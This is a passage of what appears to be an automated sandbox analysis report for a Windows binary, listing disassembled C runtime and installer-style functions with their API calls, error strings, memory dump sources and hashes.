                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 002352D6
                                                              • __getptd.LIBCMT ref: 002352E4
                                                              • __getptd.LIBCMT ref: 002352EF
                                                              • _CallCatchBlock2.LIBCMT ref: 00235315
                                                                • Part of subcall function 00234D8F: __CallSettingFrame@12.LIBCMT ref: 00234DDB
                                                                • Part of subcall function 002353BC: __getptd.LIBCMT ref: 002353CB
                                                                • Part of subcall function 002353BC: __getptd.LIBCMT ref: 002353D9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1602911419-0
                                                              • Opcode ID: 073948e22dcac3c2d606d858e0d2ed7a2f8fa1c5d39efb8e93416188e5313c72
                                                              • Instruction ID: 2e4fa9a9d7440dc91030dc98032e42d61e8de5753ec98aa6ab10b559c6407cdf
                                                              • Opcode Fuzzy Hash: 073948e22dcac3c2d606d858e0d2ed7a2f8fa1c5d39efb8e93416188e5313c72
                                                              • Instruction Fuzzy Hash: 711107B5C10219EFDB00EFA4D446BADBBB0FF04314F1084A9F818AB251DB789A21DF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022C589 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd.LIBCMT ref: 0022C595
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __amsg_exit.LIBCMT ref: 0022C5B5
                                                              • __lock.LIBCMT ref: 0022C5C5
                                                              • InterlockedDecrement.KERNEL32(?), ref: 0022C5E2
                                                              • _free.LIBCMT ref: 0022C5F5
                                                              • InterlockedIncrement.KERNEL32(02B61660), ref: 0022C60D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 3470314060-0
                                                              • Opcode ID: d4eeec6b69ff52dbcdfe12e35c9aed432afabc12df2a2a5a5943e07a2da49522
                                                              • Instruction ID: b1d5a33cd3f93a108112a729b205c1bf50a5dcd2b800d914b832b5116d823d44
                                                              • Opcode Fuzzy Hash: d4eeec6b69ff52dbcdfe12e35c9aed432afabc12df2a2a5a5943e07a2da49522
                                                              • Instruction Fuzzy Hash: 8501AD72920A32FBCB20AFA4B40A7ADB7A0BF00710F644115E84477690CB74E972CFD6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021A9AE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00219CA3: CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              • GetLastError.KERNEL32(00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,?,?,0021A8F1), ref: 0021A9EE
                                                              • ReadFile.KERNEL32(00000000,?,00000024,?,00000000,00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000), ref: 0021AA2C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,0021A8F1,?,00000000,00000004,?,00000000,?), ref: 0021AA36
                                                              • CloseHandle.KERNEL32(00000000), ref: 0021AAED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast$CloseCreateHandleRead
                                                              • String ID: $
                                                              • API String ID: 3160720760-3993045852
                                                              • Opcode ID: 40c6027e6a48c8f1407628fe160695de12663544a4d872df8a801e1b2fe87188
                                                              • Instruction ID: 24ea5430181636302473b8356a5c609817fc05611e74d17a8581d082c3e721c4
                                                              • Opcode Fuzzy Hash: 40c6027e6a48c8f1407628fe160695de12663544a4d872df8a801e1b2fe87188
                                                              • Instruction Fuzzy Hash: C0419271D2120A9FCB21CF79DA44AED77F4EF68320F248619E421E6180D77489E0CF66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00235652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___BuildCatchObject.LIBCMT ref: 00235665
                                                                • Part of subcall function 002355BB: ___BuildCatchObjectHelper.LIBCMT ref: 002355F1
                                                              • _UnwindNestedFrames.LIBCMT ref: 0023567C
                                                              • ___FrameUnwindToState.LIBCMT ref: 0023568A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                              • String ID: csm$csm
                                                              • API String ID: 2163707966-3733052814
                                                              • Opcode ID: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
                                                              • Instruction ID: 83bc8e902a80cb8bb62d5409be72961fb34fdfe548d38ef1e60297acfea0ee47
                                                              • Opcode Fuzzy Hash: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
                                                              • Instruction Fuzzy Hash: 3901F6B501191ABBDF126F51CC46EEB7F6AEF08350F444010BD1C25161DB72A9B1EFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022CD37 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd.LIBCMT ref: 0022CD43
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 0022CD5A
                                                              • __amsg_exit.LIBCMT ref: 0022CD68
                                                              • __lock.LIBCMT ref: 0022CD78
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0022CD8C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                              • String ID:
                                                              • API String ID: 938513278-0
                                                              • Opcode ID: a77e63b9e1ebb12ade9769ff07922b0421e54d99e9946b57032edbd5918af882
                                                              • Instruction ID: 7e6b8d2992b956748efddcfbaa466cad9bc68cfff8ad257211ec74efa0ccbe64
                                                              • Opcode Fuzzy Hash: a77e63b9e1ebb12ade9769ff07922b0421e54d99e9946b57032edbd5918af882
                                                              • Instruction Fuzzy Hash: 21F0F032924730BBD720BBE8B807B5C77A06F01720F208169F405A69D2CB644821CE4A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00233734 Relevance: 7.5, APIs: 5, Instructions: 29threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00229A87: _doexit.LIBCMT ref: 00229A93
                                                              • ___set_flsgetvalue.LIBCMT ref: 0023374B
                                                                • Part of subcall function 0022A57F: TlsGetValue.KERNEL32(?,00233750), ref: 0022A588
                                                                • Part of subcall function 0022A57F: _DecodePointerInternal@4.G5K9HNJ7(?,00233750), ref: 0022A59A
                                                                • Part of subcall function 0022A57F: TlsSetValue.KERNEL32(00000000,?,00233750), ref: 0022A5A9
                                                              • ___fls_getvalue@4.LIBCMT ref: 00233756
                                                                • Part of subcall function 0022A555: TlsGetValue.KERNEL32(?,?,0023375B,00000000), ref: 0022A563
                                                              • ___fls_setvalue@8.LIBCMT ref: 00233769
                                                                • Part of subcall function 0022A5B8: _DecodePointerInternal@4.G5K9HNJ7(?,?,?,0023376E,00000000,?,00000000), ref: 0022A5C9
                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00233772
                                                              • ExitThread.KERNEL32 ref: 00233779
                                                              • GetCurrentThreadId.KERNEL32 ref: 0023377F
                                                              • __freefls@4.LIBCMT ref: 0023379F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                              • String ID:
                                                              • API String ID: 1443443662-0
                                                              • Opcode ID: d50404a0dbacf69b205feadb9278bc6c10195d410db3037aca6294f9893bb4a0
                                                              • Instruction ID: e2581b2a29b933832bcfb121d376e5815719219f3780d35df2dcbca0ff6525ea
                                                              • Opcode Fuzzy Hash: d50404a0dbacf69b205feadb9278bc6c10195d410db3037aca6294f9893bb4a0
                                                              • Instruction Fuzzy Hash: D0E0BFE5C202667B8F117BF1BD0A8DF7A2C9F55355F514410BE10A7411DE389A714AA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00215CDA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00219166: LoadStringW.USER32(?,?,00000000,00000040), ref: 00219189
                                                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 00215DC5
                                                              Strings
                                                              • Failed to concatenate message with error string., xrefs: 00215D6B
                                                              • Failed to get error message for error: 0x%x., xrefs: 00215D91
                                                              • Failed to get error string from error: 0x%x, xrefs: 00215D48
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: LoadMessageString
                                                              • String ID: Failed to concatenate message with error string.$Failed to get error message for error: 0x%x.$Failed to get error string from error: 0x%x
                                                              • API String ID: 2284331267-3986587811
                                                              • Opcode ID: 2e0b96f4f7069d7c45d71c962c7e2a3feae4f5add21fd834309873cd465556a8
                                                              • Instruction ID: 8a70c30ba6d92a4c4a3e7be91e1d2be6e84d6705dc4411a5812fc9cc6661e2af
                                                              • Opcode Fuzzy Hash: 2e0b96f4f7069d7c45d71c962c7e2a3feae4f5add21fd834309873cd465556a8
                                                              • Instruction Fuzzy Hash: 8B317431D70A19FACF11ABA4AC4AADDB6F59BB0714F3045A6F40171061D7754AF0AB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021E3CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0021E3D2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,0000005F,00000000,00000010,0021E493,00000000,?,00000000,00000000), ref: 0021E43B
                                                              • __CxxThrowException@8.LIBCMT ref: 0021E460
                                                                • Part of subcall function 0021C523: __CxxThrowException@8.LIBCMT ref: 0021C58A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ByteCharH_prolog3MultiWide
                                                              • String ID: _
                                                              • API String ID: 3478574853-701932520
                                                              • Opcode ID: 5c7efceb114b8449956230a5825a62a7a739bd240452e6dc14b48c27d4684ac5
                                                              • Instruction ID: ffa9c9bef34aa03ade49a6f3258adbe0654b958c1af5e87315ad24742cd7f816
                                                              • Opcode Fuzzy Hash: 5c7efceb114b8449956230a5825a62a7a739bd240452e6dc14b48c27d4684ac5
                                                              • Instruction Fuzzy Hash: BA211DB5910246EFCB10DF58C8819AEBBF5FF58700F51886DE559A7201C370AA95CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021A414 Relevance: 6.3, APIs: 5, Instructions: 36memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00219DA9,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A41C
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00219DA9,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A43A
                                                              • HeapFree.KERNEL32(00000000,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A43D
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00219DA9,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A458
                                                              • HeapFree.KERNEL32(00000000,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A45B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$FreeProcess$CloseHandle
                                                              • String ID:
                                                              • API String ID: 1236364404-0
                                                              • Opcode ID: 8a4126bd41ed080a17d0f6190365d979862204ac31dfcbaeabd411dcc8b8f8bb
                                                              • Instruction ID: 8814e89955808d54607ce7b66316c3a30a4d979863dc30779aad3d4e28d22497
                                                              • Opcode Fuzzy Hash: 8a4126bd41ed080a17d0f6190365d979862204ac31dfcbaeabd411dcc8b8f8bb
                                                              • Instruction Fuzzy Hash: AAF08261721212AAEB106FB9AC4CFD726DC9FA0791B548111FA04D7084DAB0DCE08A72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022F6B8 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0022F6EC
                                                              • __isleadbyte_l.LIBCMT ref: 0022F71F
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00218D37,?,?,00000000,?,?,?,-00000001,00218D37,?), ref: 0022F750
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00218D37,00000001,?,00000000,?,?,?,-00000001,00218D37,?), ref: 0022F7BE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: e57867183c268a2d3f238cccff8de2b356f8a613e99c21c0a9b99c3096a313a3
                                                              • Instruction ID: 517bb76bdd95e38f8d378d3ce4333332c2985ffe9c8c44beceda155d0f902f47
                                                              • Opcode Fuzzy Hash: e57867183c268a2d3f238cccff8de2b356f8a613e99c21c0a9b99c3096a313a3
                                                              • Instruction Fuzzy Hash: B631A031A20266FFDB60DFE4E984DBA7BB9EF01310F148579E4658B1A1E730D960DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002166AE Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 67memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00F28C90,00000000,00000000,00000000,00000000,00000000,?,?,?,0021656E,?,?,0021AFDF,00000007,?), ref: 0021671A
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,0021656E,?,?,0021AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00216721
                                                                • Part of subcall function 00218E6F: GetProcessHeap.KERNEL32(00000000,?,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E79
                                                                • Part of subcall function 00218E6F: HeapFree.KERNEL32(00000000,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E80
                                                              Strings
                                                              • Failed to realloc cleanup list buffer, xrefs: 00216735
                                                              • Failed to copy the file name, xrefs: 002166E0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: Failed to copy the file name$Failed to realloc cleanup list buffer
                                                              • API String ID: 756756679-1190809427
                                                              • Opcode ID: f88db6b6e6dd4fd4a15440f6332de96cc7c704fd19f33b1e935e1fac1113a3cd
                                                              • Instruction ID: a925cee91de3b32c07093d685e1543392bae7c235baa16985747419221a2ff37
                                                              • Opcode Fuzzy Hash: f88db6b6e6dd4fd4a15440f6332de96cc7c704fd19f33b1e935e1fac1113a3cd
                                                              • Instruction Fuzzy Hash: 8D117FB5920245FFCB04DFA4ED8D8DEBBF9EB64714720806AE106F7250DA719A91CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219C21 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000000,0023BEF0,?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C43
                                                              • GetLastError.KERNEL32(?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C53
                                                              • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C64
                                                              • GetLastError.KERNEL32(?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C6E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast$DeleteMove
                                                              • String ID:
                                                              • API String ID: 4226254011-0
                                                              • Opcode ID: 420831a0d8bfd2c650c27b33a814136b8f9cdd8d565e0fa18f8d7a624133e58c
                                                              • Instruction ID: 66bcce17b8f9af1ec9ba5fd8d3f30d4bff36f56cffb0b071d6ab9cfe0a2d74a8
                                                              • Opcode Fuzzy Hash: 420831a0d8bfd2c650c27b33a814136b8f9cdd8d565e0fa18f8d7a624133e58c
                                                              • Instruction Fuzzy Hash: E201763362020667E7204B65DD55BDA6ADD8FF4360F250036EB05E3000DA34CCE086E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00228961 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: I5#$kQ"
                                                              • API String ID: 431132790-2201689415
                                                              • Opcode ID: fa4cbfc5489a44510bc72ce715c863e2f915752c96810e41fae28bc024ae820f
                                                              • Instruction ID: 7051553661b93ab6d431e1ae61fa5b7409b4d21d3f768b92d83aa03dfefdd27e
                                                              • Opcode Fuzzy Hash: fa4cbfc5489a44510bc72ce715c863e2f915752c96810e41fae28bc024ae820f
                                                              • Instruction Fuzzy Hash: 1C7109B4911B26EFCB10DFA9C5809AAFBF0BF08304F50895EE559A7711C770AA54CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218C9A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00219A43: GetProcessHeap.KERNEL32(00000000,?,?,00218CCC,?,?,00000000), ref: 00219A4D
                                                                • Part of subcall function 00219A43: HeapSize.KERNEL32(00000000,?,00218CCC,?,?,00000000), ref: 00219A54
                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00218CE0
                                                              • _vswprintf_s.LIBCMT ref: 00218D32
                                                                • Part of subcall function 00218836: GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00218D82,00000000), ref: 00218852
                                                                • Part of subcall function 00218836: HeapReAlloc.KERNEL32(00000000,?,00218D82,00000000), ref: 00218859
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocSize_vswprintf_slstrlen
                                                              • String ID: z
                                                              • API String ID: 1418926380-1657960367
                                                              • Opcode ID: a901c5d17221f313e643933de71db5a5bf2a204b418bcfc43c62e99034cdff8d
                                                              • Instruction ID: 6390d492277152c066779bc37b5153d298c800d2085fcd2ceb65eafac94c0989
                                                              • Opcode Fuzzy Hash: a901c5d17221f313e643933de71db5a5bf2a204b418bcfc43c62e99034cdff8d
                                                              • Instruction Fuzzy Hash: 3331B031D20625EBCF219F7898C46DDFBF4AFB5350F344596E811EB250DA318EA09B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00234740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: @
                                                              • API String ID: 4104443479-2766056989
                                                              • Opcode ID: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                              • Instruction ID: 4ede3aad3ac10eb44b677cedc2b4b99c2e5f84e2f2b99de08389e104c27fc488
                                                              • Opcode Fuzzy Hash: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                              • Instruction Fuzzy Hash: A63181F6920219ABDB08DF64DC80AAA73A8FF44354F054659ED15AB700D734EF60CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218B99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _vswprintf_s.LIBCMT ref: 00218C1D
                                                                • Part of subcall function 00219A43: GetProcessHeap.KERNEL32(00000000,?,?,00218CCC,?,?,00000000), ref: 00219A4D
                                                                • Part of subcall function 00219A43: HeapSize.KERNEL32(00000000,?,00218CCC,?,?,00000000), ref: 00219A54
                                                              • lstrlenW.KERNEL32(?,?,?,?,?), ref: 00218BCD
                                                              Strings
                                                              Memory Dump Source
